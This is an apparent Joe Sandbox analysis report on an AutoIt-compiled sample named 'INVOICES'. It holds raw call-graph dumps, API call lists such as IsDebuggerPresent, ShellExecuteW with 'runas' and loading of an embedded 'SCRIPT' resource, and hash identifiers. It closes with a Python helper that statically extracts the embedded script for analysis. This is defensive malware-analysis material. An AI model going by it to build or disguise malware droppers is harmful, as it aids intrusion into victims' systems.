98940->98941 98942 768056 98941->98942 98945 758f36 __write_nolock 9 API calls 98942->98945 98943 768125 98946 758c74 __write_nolock 58 API calls 98943->98946 98944->98943 98951 768103 98944->98951 98947 768060 98945->98947 98948 76812a 98946->98948 98947->98927 98949 758ca8 __fseek_nolock 58 API calls 98948->98949 98950 768137 98949->98950 98952 758f36 __write_nolock 9 API calls 98950->98952 98953 75d414 __alloc_osfhnd 61 API calls 98951->98953 98952->98978 98954 7681d1 98953->98954 98955 7681fe 98954->98955 98956 7681db 98954->98956 98958 767e7d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98955->98958 98957 758c74 __write_nolock 58 API calls 98956->98957 98959 7681e0 98957->98959 98969 768220 98958->98969 98960 758ca8 __fseek_nolock 58 API calls 98959->98960 98962 7681ea 98960->98962 98961 76829e GetFileType 98963 7682eb 98961->98963 98964 7682a9 GetLastError 98961->98964 98967 758ca8 __fseek_nolock 58 API calls 98962->98967 98972 75d6aa __set_osfhnd 59 API calls 98963->98972 98968 758c87 __dosmaperr 58 API calls 98964->98968 98965 76826c GetLastError 98966 758c87 __dosmaperr 58 API calls 98965->98966 98973 768291 98966->98973 98967->98947 98970 7682d0 CloseHandle 98968->98970 98969->98961 98969->98965 98971 767e7d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98969->98971 98970->98973 98974 7682de 98970->98974 98975 768261 98971->98975 98981 768309 98972->98981 98976 758ca8 __fseek_nolock 58 API calls 98973->98976 98977 758ca8 __fseek_nolock 58 API calls 98974->98977 98975->98961 98975->98965 98976->98978 98979 7682e3 98977->98979 98978->98933 98979->98973 98980 7684c4 98980->98978 98983 768697 CloseHandle 98980->98983 98981->98980 98982 761a41 __lseeki64_nolock 60 API calls 98981->98982 98997 76838a 98981->98997 98984 768373 98982->98984 98985 767e7d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98983->98985 98987 758c74 __write_nolock 58 API calls 98984->98987 99005 768392 98984->99005 98986 7686be 98985->98986 98988 
7686c6 GetLastError 98986->98988 98989 76854e 98986->98989 98987->98997 98990 758c87 __dosmaperr 58 API calls 98988->98990 98989->98978 98991 7686d2 98990->98991 98995 75d5bd __free_osfhnd 59 API calls 98991->98995 98992 760fdb 70 API calls __read_nolock 98992->99005 98993 760c5d __close_nolock 61 API calls 98993->99005 98994 769922 __chsize_nolock 82 API calls 98994->99005 98995->98989 98996 75da06 __write 78 API calls 98996->98997 98997->98980 98997->98996 99000 761a41 60 API calls __lseeki64_nolock 98997->99000 98997->99005 98998 768541 99001 760c5d __close_nolock 61 API calls 98998->99001 98999 76852a 98999->98980 99000->98997 99002 768548 99001->99002 99004 758ca8 __fseek_nolock 58 API calls 99002->99004 99003 761a41 60 API calls __lseeki64_nolock 99003->99005 99004->98989 99005->98992 99005->98993 99005->98994 99005->98997 99005->98998 99005->98999 99005->99003 99006->98923 99007->98929 99008->98929 99010 734ce1 99009->99010 99011 734d9d LoadLibraryA 99009->99011 99010->98809 99010->98812 99011->99010 99012 734dae GetProcAddress 99011->99012 99012->99010 99014 750f36 Mailbox 59 API calls 99013->99014 99015 7353a0 99014->99015 99015->98817 99017 735003 FindResourceExW 99016->99017 99018 735020 99016->99018 99017->99018 99019 76dc8c LoadResource 99017->99019 99018->98818 99019->99018 99020 76dca1 SizeofResource 99019->99020 99020->99018 99021 76dcb5 LockResource 99020->99021 99021->99018 99023 76dd04 99022->99023 99024 735054 99022->99024 99028 7559bd 99024->99028 99026 735062 99026->98829 99027->98818 99029 7559c9 __initptd 99028->99029 99030 7559db 99029->99030 99032 755a01 99029->99032 99041 758ca8 58 API calls __getptd_noexit 99030->99041 99043 756d8e 99032->99043 99033 7559e0 99042 758f36 9 API calls __write_nolock 99033->99042 99036 755a07 99049 75592e 83 API calls 4 library calls 99036->99049 99038 755a16 99050 755a38 RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 99038->99050 99040 7559eb __initptd 99040->99026 99041->99033 99042->99040 99044 
756dc0 RtlEnterCriticalSection 99043->99044 99045 756d9e 99043->99045 99048 756db6 99044->99048 99045->99044 99046 756da6 99045->99046 99047 759d8b __lock 58 API calls 99046->99047 99047->99048 99048->99036 99049->99038 99050->99040 99054 75576d 99051->99054 99053 73508e 99053->98837 99055 755779 __initptd 99054->99055 99056 7557bc 99055->99056 99057 75578f _memset 99055->99057 99058 7557b4 __initptd 99055->99058 99059 756d8e __lock_file 59 API calls 99056->99059 99067 758ca8 58 API calls __getptd_noexit 99057->99067 99058->99053 99061 7557c2 99059->99061 99069 75558d 72 API calls 6 library calls 99061->99069 99062 7557a9 99068 758f36 9 API calls __write_nolock 99062->99068 99065 7557d8 99070 7557f6 RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 99065->99070 99067->99062 99068->99058 99069->99065 99070->99058 99074 75537a GetSystemTimeAsFileTime 99071->99074 99073 799017 99073->98839 99075 7553a8 __aulldiv 99074->99075 99075->99073 99077 755ddc __initptd 99076->99077 99078 755e03 99077->99078 99079 755dee 99077->99079 99081 756d8e __lock_file 59 API calls 99078->99081 99090 758ca8 58 API calls __getptd_noexit 99079->99090 99083 755e09 99081->99083 99082 755df3 99091 758f36 9 API calls __write_nolock 99082->99091 99092 755a40 67 API calls 4 library calls 99083->99092 99086 755e14 99093 755e34 RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 99086->99093 99088 755e26 99089 755dfe __initptd 99088->99089 99089->98844 99090->99082 99091->99089 99092->99086 99093->99088 99094->98712 99095->98720 99096->98733 99097->98735 99098->98732 99099->98740 99100->98741 99102 7997f1 __tzset_nolock _wcscmp 99101->99102 99103 799685 99102->99103 99104 73506b 74 API calls 99102->99104 99105 7991b2 GetSystemTimeAsFileTime 99102->99105 99106 735045 85 API calls 99102->99106 99103->98751 99103->98779 99104->99102 99105->99102 99106->99102 99107->98778 99109 755522 __initptd 99108->99109 99110 755536 99109->99110 99111 75554e 99109->99111 99137 758ca8 58 API calls 
__getptd_noexit 99110->99137 99113 756d8e __lock_file 59 API calls 99111->99113 99117 755546 __initptd 99111->99117 99115 755560 99113->99115 99114 75553b 99138 758f36 9 API calls __write_nolock 99114->99138 99121 7554aa 99115->99121 99117->98783 99122 7554cd 99121->99122 99123 7554b9 99121->99123 99126 7554c9 99122->99126 99140 754bad 99122->99140 99183 758ca8 58 API calls __getptd_noexit 99123->99183 99125 7554be 99184 758f36 9 API calls __write_nolock 99125->99184 99139 755585 RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 99126->99139 99133 7554e7 99157 760b82 99133->99157 99135 7554ed 99135->99126 99136 752ed5 _free 58 API calls 99135->99136 99136->99126 99137->99114 99138->99117 99139->99117 99141 754bc0 99140->99141 99142 754be4 99140->99142 99141->99142 99143 754856 __fseek_nolock 58 API calls 99141->99143 99146 760cf7 99142->99146 99144 754bdd 99143->99144 99185 75da06 99144->99185 99147 760d04 99146->99147 99149 7554e1 99146->99149 99148 752ed5 _free 58 API calls 99147->99148 99147->99149 99148->99149 99150 754856 99149->99150 99151 754875 99150->99151 99152 754860 99150->99152 99151->99133 99320 758ca8 58 API calls __getptd_noexit 99152->99320 99154 754865 99321 758f36 9 API calls __write_nolock 99154->99321 99156 754870 99156->99133 99158 760b8e __initptd 99157->99158 99159 760b9b 99158->99159 99162 760bb2 99158->99162 99337 758c74 58 API calls __getptd_noexit 99159->99337 99161 760c3d 99342 758c74 58 API calls __getptd_noexit 99161->99342 99162->99161 99164 760bc2 99162->99164 99163 760ba0 99338 758ca8 58 API calls __getptd_noexit 99163->99338 99167 760be0 99164->99167 99168 760bea 99164->99168 99339 758c74 58 API calls __getptd_noexit 99167->99339 99171 75d386 ___lock_fhandle 59 API calls 99168->99171 99169 760be5 99343 758ca8 58 API calls __getptd_noexit 99169->99343 99173 760bf0 99171->99173 99175 760c03 99173->99175 99176 760c0e 99173->99176 99174 760c49 99344 758f36 9 API calls __write_nolock 99174->99344 99322 760c5d 99175->99322 99340 
758ca8 58 API calls __getptd_noexit 99176->99340 99180 760ba7 __initptd 99180->99135 99181 760c09 99341 760c35 RtlLeaveCriticalSection __unlock_fhandle 99181->99341 99183->99125 99184->99126 99186 75da12 __initptd 99185->99186 99187 75da36 99186->99187 99188 75da1f 99186->99188 99190 75dad5 99187->99190 99191 75da4a 99187->99191 99286 758c74 58 API calls __getptd_noexit 99188->99286 99292 758c74 58 API calls __getptd_noexit 99190->99292 99194 75da72 99191->99194 99195 75da68 99191->99195 99193 75da24 99287 758ca8 58 API calls __getptd_noexit 99193->99287 99213 75d386 99194->99213 99288 758c74 58 API calls __getptd_noexit 99195->99288 99199 75da6d 99293 758ca8 58 API calls __getptd_noexit 99199->99293 99200 75da78 99202 75da9e 99200->99202 99203 75da8b 99200->99203 99289 758ca8 58 API calls __getptd_noexit 99202->99289 99222 75daf5 99203->99222 99204 75dae1 99294 758f36 9 API calls __write_nolock 99204->99294 99208 75da2b __initptd 99208->99142 99209 75da97 99291 75dacd RtlLeaveCriticalSection __unlock_fhandle 99209->99291 99210 75daa3 99290 758c74 58 API calls __getptd_noexit 99210->99290 99214 75d392 __initptd 99213->99214 99215 75d3e1 RtlEnterCriticalSection 99214->99215 99216 759d8b __lock 58 API calls 99214->99216 99217 75d407 __initptd 99215->99217 99218 75d3b7 99216->99218 99217->99200 99219 75d3cf 99218->99219 99295 759fab InitializeCriticalSectionAndSpinCount 99218->99295 99296 75d40b RtlLeaveCriticalSection _doexit 99219->99296 99223 75db02 __write_nolock 99222->99223 99224 75db41 99223->99224 99225 75db60 99223->99225 99256 75db36 99223->99256 99306 758c74 58 API calls __getptd_noexit 99224->99306 99230 75dbb8 99225->99230 99231 75db9c 99225->99231 99226 75c776 __write_nolock 6 API calls 99228 75e356 99226->99228 99228->99209 99229 75db46 99307 758ca8 58 API calls __getptd_noexit 99229->99307 99234 75dbd1 99230->99234 99312 761a41 60 API calls 3 library calls 99230->99312 99309 758c74 58 API calls __getptd_noexit 99231->99309 99297 765deb 99234->99297 
99235 75dba1 99310 758ca8 58 API calls __getptd_noexit 99235->99310 99236 75db4d 99308 758f36 9 API calls __write_nolock 99236->99308 99241 75dbdf 99243 75df38 99241->99243 99313 759b2c 58 API calls 2 library calls 99241->99313 99242 75dba8 99311 758f36 9 API calls __write_nolock 99242->99311 99244 75df56 99243->99244 99245 75e2cb WriteFile 99243->99245 99248 75e07a 99244->99248 99254 75df6c 99244->99254 99249 75df2b GetLastError 99245->99249 99258 75def8 99245->99258 99259 75e16f 99248->99259 99261 75e085 99248->99261 99249->99258 99250 75dc0b GetConsoleMode 99250->99243 99252 75dc4a 99250->99252 99251 75e304 99251->99256 99318 758ca8 58 API calls __getptd_noexit 99251->99318 99252->99243 99253 75dc5a GetConsoleCP 99252->99253 99253->99251 99280 75dc89 99253->99280 99254->99251 99255 75dfdb WriteFile 99254->99255 99255->99249 99260 75e018 99255->99260 99256->99226 99258->99251 99258->99256 99263 75e058 99258->99263 99259->99251 99266 75e1e4 WideCharToMultiByte 99259->99266 99260->99254 99267 75e03c 99260->99267 99261->99251 99268 75e0ea WriteFile 99261->99268 99262 75e332 99319 758c74 58 API calls __getptd_noexit 99262->99319 99264 75e063 99263->99264 99265 75e2fb 99263->99265 99315 758ca8 58 API calls __getptd_noexit 99264->99315 99317 758c87 58 API calls 3 library calls 99265->99317 99266->99249 99279 75e22b 99266->99279 99267->99258 99268->99249 99272 75e139 99268->99272 99272->99258 99272->99261 99272->99267 99273 75e068 99316 758c74 58 API calls __getptd_noexit 99273->99316 99274 75e233 WriteFile 99277 75e286 GetLastError 99274->99277 99274->99279 99277->99279 99278 76643a 60 API calls __write_nolock 99278->99280 99279->99258 99279->99259 99279->99267 99279->99274 99280->99258 99280->99278 99281 75dd72 WideCharToMultiByte 99280->99281 99284 75dddf 99280->99284 99314 753775 58 API calls __isleadbyte_l 99280->99314 99281->99258 99282 75ddad WriteFile 99281->99282 99282->99249 99282->99284 99283 767bde WriteConsoleW CreateFileW __putwch_nolock 99283->99284 
99284->99249 99284->99258 99284->99280 99284->99283 99285 75de07 WriteFile 99284->99285 99285->99249 99285->99284 99286->99193 99287->99208 99288->99199 99289->99210 99290->99209 99291->99208 99292->99199 99293->99204 99294->99208 99295->99219 99296->99215 99298 765df6 99297->99298 99299 765e03 99297->99299 99300 758ca8 __fseek_nolock 58 API calls 99298->99300 99301 758ca8 __fseek_nolock 58 API calls 99299->99301 99303 765e0f 99299->99303 99302 765dfb 99300->99302 99304 765e30 99301->99304 99302->99241 99303->99241 99305 758f36 __write_nolock 9 API calls 99304->99305 99305->99302 99306->99229 99307->99236 99308->99256 99309->99235 99310->99242 99311->99256 99312->99234 99313->99250 99314->99280 99315->99273 99316->99256 99317->99256 99318->99262 99319->99256 99320->99154 99321->99156 99345 75d643 99322->99345 99324 760cc1 99358 75d5bd 59 API calls 2 library calls 99324->99358 99326 760c6b 99326->99324 99327 760c9f 99326->99327 99330 75d643 __lseek_nolock 58 API calls 99326->99330 99327->99324 99328 75d643 __lseek_nolock 58 API calls 99327->99328 99331 760cab CloseHandle 99328->99331 99329 760cc9 99332 760ceb 99329->99332 99359 758c87 58 API calls 3 library calls 99329->99359 99333 760c96 99330->99333 99331->99324 99334 760cb7 GetLastError 99331->99334 99332->99181 99336 75d643 __lseek_nolock 58 API calls 99333->99336 99334->99324 99336->99327 99337->99163 99338->99180 99339->99169 99340->99181 99341->99180 99342->99169 99343->99174 99344->99180 99346 75d663 99345->99346 99347 75d64e 99345->99347 99351 75d688 99346->99351 99362 758c74 58 API calls __getptd_noexit 99346->99362 99360 758c74 58 API calls __getptd_noexit 99347->99360 99350 75d653 99361 758ca8 58 API calls __getptd_noexit 99350->99361 99351->99326 99352 75d692 99363 758ca8 58 API calls __getptd_noexit 99352->99363 99355 75d65b 99355->99326 99356 75d69a 99364 758f36 9 API calls __write_nolock 99356->99364 99358->99329 99359->99332 99360->99350 99361->99355 99362->99352 99363->99356 99364->99355 99427 
761ac0 99365->99427 99368 7348f7 99429 737eec 99368->99429 99369 7348da 99370 737d2c 59 API calls 99369->99370 99372 7348e6 99370->99372 99373 737886 59 API calls 99372->99373 99374 7348f2 99373->99374 99375 750911 99374->99375 99376 761ac0 __write_nolock 99375->99376 99377 75091e GetLongPathNameW 99376->99377 99378 737d2c 59 API calls 99377->99378 99379 73741d 99378->99379 99380 73716b 99379->99380 99381 7377c7 59 API calls 99380->99381 99382 73717d 99381->99382 99383 7348ae 60 API calls 99382->99383 99384 737188 99383->99384 99385 737193 99384->99385 99389 76ebde 99384->99389 99387 733f84 59 API calls 99385->99387 99388 73719f 99387->99388 99433 7334c2 99388->99433 99390 76ebf8 99389->99390 99439 737a68 61 API calls 99389->99439 99392 7371b2 Mailbox 99392->98541 99394 734f3d 136 API calls 99393->99394 99395 7369ef 99394->99395 99396 76e38a 99395->99396 99398 734f3d 136 API calls 99395->99398 99397 799604 122 API calls 99396->99397 99399 76e39f 99397->99399 99400 736a03 99398->99400 99401 76e3a3 99399->99401 99402 76e3c0 99399->99402 99400->99396 99403 736a0b 99400->99403 99404 734faa 84 API calls 99401->99404 99405 750f36 Mailbox 59 API calls 99402->99405 99406 736a17 99403->99406 99407 76e3ab 99403->99407 99404->99407 99426 76e405 Mailbox 99405->99426 99440 736bec 99406->99440 99547 794339 90 API calls _wprintf 99407->99547 99411 76e3b9 99411->99402 99412 76e5b9 99413 752ed5 _free 58 API calls 99412->99413 99414 76e5c1 99413->99414 99415 734faa 84 API calls 99414->99415 99420 76e5ca 99415->99420 99419 752ed5 _free 58 API calls 99419->99420 99420->99419 99421 734faa 84 API calls 99420->99421 99551 78fad2 89 API calls 4 library calls 99420->99551 99421->99420 99423 737f41 59 API calls 99423->99426 99426->99412 99426->99420 99426->99423 99533 73766f 99426->99533 99541 7374bd 99426->99541 99548 78fa6e 59 API calls 2 library calls 99426->99548 99549 78f98f 61 API calls 2 library calls 99426->99549 99550 797428 59 API calls Mailbox 99426->99550 99428 7348bb 

Control-flow Graph

APIs
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00733B7A
• IsDebuggerPresent.KERNEL32 ref: 00733B8C
• GetFullPathNameW.KERNEL32(00007FFF,?,?,007F52F8,007F52E0,?,?), ref: 00733BFD
  • Part of subcall function 00737D2C: _memmove.LIBCMT ref: 00737D66
  • Part of subcall function 00740A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00733C26,007F52F8,?,?,?), ref: 00740ACE
• SetCurrentDirectoryW.KERNEL32(?), ref: 00733C81
• MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,007E7770,00000010), ref: 0076D3EC
• SetCurrentDirectoryW.KERNEL32(?,007F52F8,?,?,?), ref: 0076D424
• GetForegroundWindow.USER32(runas,?,?,?,00000001,?,007E4260,007F52F8,?,?,?), ref: 0076D4AA
• ShellExecuteW.SHELL32(00000000,?,?), ref: 0076D4B1
  • Part of subcall function 00733A58: GetSysColorBrush.USER32(0000000F), ref: 00733A62
  • Part of subcall function 00733A58: LoadCursorW.USER32(00000000,00007F00), ref: 00733A71
  • Part of subcall function 00733A58: LoadIconW.USER32(00000063), ref: 00733A88
  • Part of subcall function 00733A58: LoadIconW.USER32(000000A4), ref: 00733A9A
  • Part of subcall function 00733A58: LoadIconW.USER32(000000A2), ref: 00733AAC
  • Part of subcall function 00733A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00733AD2
  • Part of subcall function 00733A58: RegisterClassExW.USER32(?), ref: 00733B28
  • Part of subcall function 007339E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00733A15
  • Part of subcall function 007339E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00733A36
  • Part of subcall function 007339E7: ShowWindow.USER32(00000000,?,?), ref: 00733A4A
  • Part of subcall function 007339E7: ShowWindow.USER32(00000000,?,?), ref: 00733A53
  • Part of subcall function 007343DB: _memset.LIBCMT ref: 00734401
  • Part of subcall function 007343DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 007344A6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
• String ID: This is a third-party compiled AutoIt script.$runas$%|
• API String ID: 529118366-4059233762
• Opcode ID: 24fdd50d300ea14814df717c6d590cbc738d61d9ed94ff4ff68bfeb6ed56df75
• Instruction ID: 3515ebd62ce5645d43d9638fb7a9a2ab75e111c59dbffc6aa60481a914c0629d
• Opcode Fuzzy Hash: 24fdd50d300ea14814df717c6d590cbc738d61d9ed94ff4ff68bfeb6ed56df75
• Instruction Fuzzy Hash: D55108B0E04288EAEF25EBB4DC09EFD7B74BB04700F008265FA51A6193DA7C5A01DB25

Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 007336D2
                                                                                                                                  • KillTimer.USER32(?,00000001), ref: 007336FC
                                                                                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0073371F
                                                                                                                                  • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 0073372A
                                                                                                                                  • CreatePopupMenu.USER32 ref: 0073373E
                                                                                                                                  • PostQuitMessage.USER32(00000000), ref: 0073375F
                                                                                                                                  Strings
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                                                                                                                                  • String ID: TaskbarCreated$%|
                                                                                                                                  • API String ID: 157504867-294584353
                                                                                                                                  • Opcode ID: bb7c075667c9ca5739421a7fa415f9e158475540a15f6310549d40c1eb2ae950
                                                                                                                                  • Instruction ID: 82dbc273d6f0857480acefed1e3e008a74c94f33536f278c32b560ba49153dc9
                                                                                                                                  • Opcode Fuzzy Hash: bb7c075667c9ca5739421a7fa415f9e158475540a15f6310549d40c1eb2ae950
                                                                                                                                  • Instruction Fuzzy Hash: AC41F1B2600509FFFB346B68EC4EB7A3B55FB04740F504225FB02862A3DA6CAE409765

Control-flow Graph

• Graph rendered in the report (node list not reproduced). Function entry 734fe9; a straight chain 734fe9 CreateStreamOnHGlobal → 735003 FindResourceExW → 76dc8c LoadResource → 76dca1 SizeofResource → 76dcb5 LockResource → 76dcc6-76dce4. Every call-bearing block also has a second edge to the common exit (CreateStreamOnHGlobal straight to 735021-735026, the others via 735020), so any step can short-circuit to the return.
                                                                                                                                  APIs
                                                                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00734FF9
                                                                                                                                  • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00734EEE,?,?,00000000,00000000), ref: 00735010
                                                                                                                                  • LoadResource.KERNEL32(?,00000000,?,?,00734EEE,?,?,00000000,00000000,?,?,?,?,?,?,00734F8F), ref: 0076DC90
                                                                                                                                  • SizeofResource.KERNEL32(?,00000000,?,?,00734EEE,?,?,00000000,00000000,?,?,?,?,?,?,00734F8F), ref: 0076DCA5
                                                                                                                                  • LockResource.KERNEL32(Ns,?,?,00734EEE,?,?,00000000,00000000,?,?,?,?,?,?,00734F8F,00000000), ref: 0076DCB8
                                                                                                                                  Strings
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                  • String ID: SCRIPT$Ns
                                                                                                                                  • API String ID: 3051347437-724470426
                                                                                                                                  • Opcode ID: 16be628a778fcfa6de8aeb45a991e7972afe2dad12c181ef391e286ba9416b80
                                                                                                                                  • Instruction ID: 2f7be586ec879836e8122c71196a54791fd291664063d7359068ed23c73ce551
                                                                                                                                  • Opcode Fuzzy Hash: 16be628a778fcfa6de8aeb45a991e7972afe2dad12c181ef391e286ba9416b80
                                                                                                                                  • Instruction Fuzzy Hash: 8F117C75200704BFE7258B65DD48F6B7BB9FBC9B11F20826CF406D6260DB76EC008660
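The FindResourceExW(hModule, 0000000A, "SCRIPT", 0) call listed above is the AutoIt3 runtime locating its compiled script: resource type 0xA is RT_RCDATA and the name is the literal "SCRIPT"; LoadResource, SizeofResource and LockResource then hand the bytes to the stream created by CreateStreamOnHGlobal. The following is an added example, not code from the report or from the sample, that performs the same lookup statically with a pure-Python walk of the PE resource directory, so the script body can be located and carved from the file without running it. It assumes only the documented on-disk PE layout; the AU3_SCRIPT_MAGIC constant (the header a compiled AutoIt3 script body starts with) is taken from public AutoIt unpacker write-ups rather than from this page, and build_rsrc_sample constructs test data instead of reading a real binary.

```python
import struct

RT_RCDATA = 10  # the 0000000A type argument passed to FindResourceExW above

# Assumed from public AutoIt unpacker write-ups (not from this report): a compiled
# AutoIt3 script body starts with this 16-byte signature followed by "AU3!EA06".
AU3_SCRIPT_MAGIC = bytes.fromhex("A3484BBE986C4AA9994C530A86D6487D") + b"AU3!EA06"


def rsrc_section_from_pe(pe: bytes):
    """Return (raw bytes, RVA) of the .rsrc section of a PE image read from disk."""
    e_lfanew, = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    n_sections, = struct.unpack_from("<H", pe, e_lfanew + 6)
    opt_size, = struct.unpack_from("<H", pe, e_lfanew + 20)
    table = e_lfanew + 24 + opt_size            # section table follows the optional header
    for i in range(n_sections):
        hdr = table + 40 * i
        name = pe[hdr:hdr + 8].rstrip(b"\0")
        _vsize, rva, raw_size, raw_ptr = struct.unpack_from("<IIII", pe, hdr + 8)
        if name == b".rsrc":
            return pe[raw_ptr:raw_ptr + raw_size], rva
    raise ValueError("no .rsrc section")


def _name_at(rsrc: bytes, off: int) -> str:
    """Decode an IMAGE_RESOURCE_DIR_STRING_U (UTF-16LE, length-prefixed in characters)."""
    n, = struct.unpack_from("<H", rsrc, off)
    return rsrc[off + 2:off + 2 + 2 * n].decode("utf-16-le")


def walk_resources(rsrc: bytes, dir_off: int = 0, path=()):
    """Yield (path, data_rva, size) for every leaf of the type/name/language tree."""
    if len(path) >= 3:
        raise ValueError("resource directory nested deeper than type/name/language")
    *_, n_named, n_id = struct.unpack_from("<IIHHHH", rsrc, dir_off)
    for i in range(n_named + n_id):
        ident, off = struct.unpack_from("<II", rsrc, dir_off + 16 + 8 * i)
        key = _name_at(rsrc, ident & 0x7FFFFFFF) if ident & 0x80000000 else ident
        if off & 0x80000000:                     # high bit set: offset of a subdirectory
            yield from walk_resources(rsrc, off & 0x7FFFFFFF, path + (key,))
        else:                                    # leaf: IMAGE_RESOURCE_DATA_ENTRY
            data_rva, size, _codepage, _ = struct.unpack_from("<IIII", rsrc, off)
            yield path + (key,), data_rva, size


def find_autoit_script(rsrc: bytes):
    """Static equivalent of FindResourceExW(hMod, RT_RCDATA, L"SCRIPT", 0): (data_rva, size) or None."""
    for path, data_rva, size in walk_resources(rsrc):
        if len(path) == 3 and path[0] == RT_RCDATA and str(path[1]).upper() == "SCRIPT":
            return data_rva, size
    return None


def resource_bytes(rsrc: bytes, rsrc_rva: int, data_rva: int, size: int) -> bytes:
    """Carve a resource body; data RVAs are image-relative, so rebase them onto the section."""
    start = data_rva - rsrc_rva
    if start < 0 or start + size > len(rsrc):
        raise ValueError("resource data lies outside the .rsrc section")
    return rsrc[start:start + size]


def is_autoit_script(data: bytes) -> bool:
    return data.startswith(AU3_SCRIPT_MAGIC)


def build_rsrc_sample(script: bytes, rsrc_rva: int = 0x10000, name: str = "SCRIPT") -> bytes:
    """Constructed test data: a minimal .rsrc section with one RT_RCDATA resource (not a real file)."""
    def directory(n_named, n_id):
        return struct.pack("<IIHHHH", 0, 0, 0, 0, n_named, n_id)
    name_u16 = name.encode("utf-16-le")
    # Fixed layout: root dir @0, type dir @24, language dir @48, data entry @72, name @88, data after it.
    data_off = 88 + 2 + len(name_u16)
    buf = directory(0, 1) + struct.pack("<II", RT_RCDATA, 0x80000000 | 24)
    buf += directory(1, 0) + struct.pack("<II", 0x80000000 | 88, 0x80000000 | 48)
    buf += directory(0, 1) + struct.pack("<II", 0, 72)       # language 0 -> data entry at 72
    buf += struct.pack("<IIII", rsrc_rva + data_off, len(script), 0, 0)
    buf += struct.pack("<H", len(name)) + name_u16
    assert len(buf) == data_off
    return buf + script


if __name__ == "__main__":
    import sys
    with open(sys.argv[1], "rb") as f:
        rsrc, rva = rsrc_section_from_pe(f.read())
    hit = find_autoit_script(rsrc)
    if hit:
        body = resource_bytes(rsrc, rva, *hit)
        print(f"RT_RCDATA 'SCRIPT' at RVA {hit[0]:#x}, {hit[1]} bytes, AU3 header: {is_autoit_script(body)}")
    else:
        print("no RT_RCDATA 'SCRIPT' resource")
```

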